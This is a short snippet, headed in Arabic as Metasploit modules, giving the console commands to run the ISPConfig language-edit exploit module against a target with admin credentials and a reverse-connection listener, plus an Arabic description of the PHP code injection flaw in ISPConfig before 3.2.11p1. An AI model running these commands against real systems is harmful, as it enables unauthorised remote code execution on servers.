
وحدات Metasploit
وحدة Metasploit

use exploit/linux/http/ispconfig_language_edit
set RHOSTS target.com
set USERNAME admin
set PASSWORD password123
set LHOST 127.0.0.1
set LPORT 4444
exploit
تم اكتشاف ثغرة في ISPConfig قبل الإصدار 3.2.11p1. يمكن تنفيذ حقن أكواد PHP في محرر ملف اللغة من قبل مسؤول إذا كان خيار admin_allow_langedit مفعّلاً.